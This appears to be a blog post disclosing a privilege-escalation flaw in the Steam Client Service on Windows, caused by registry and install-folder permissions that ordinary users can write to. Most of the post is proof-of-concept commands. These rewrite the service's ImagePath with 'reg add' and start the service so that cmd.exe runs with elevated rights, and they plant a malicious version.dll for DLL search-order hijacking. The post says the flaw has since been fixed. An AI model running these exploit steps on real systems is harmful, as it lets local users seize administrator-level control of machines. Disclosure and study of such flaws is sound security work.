Steam Client Service can be started/stopped with user access and also "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" is full control for the Users group. So , attacker can add reg key to get privilege access.
POC:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "C:\windows\system32\cmd.exe /c echo pwned > C:\0day.txt"
net start "Steam Client Service"
And also default installation path is full access for user groups. So,
version.dll which is loaded by steam client service that doesn't exist can be hijacked by transferring malicious dll file rename as version.dll to steam installation path ( C:\Program Files (x86)\Steam\bin ) .
Dll Search Order Hijacking
version.dll name not found in process monitor. So copy malicious dll to installation bin path rename as version.dll . And reg key add to value as "C:\Program Files (x86)\Steam\bin\SteamService.exe /RunAsService"
POC:
copy C:\testbin\malicious.dll version.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "\"C:\Program Files (x86)\Steam\bin\SteamService.exe\" /RunAsService"
net start "Steam Client Service"
Rollback :
C:\Program Files (x86)\Common Files\Steam>SteamService.exe /repair && SteamService.exe /install
B00M !!! Steam gammers' hell come !!!
updated: they updated and fixed.
Ref:
https://attack.mitre.org/techniques/T1058/
https://attack.mitre.org/techniques/T1038/
No comments:
Post a Comment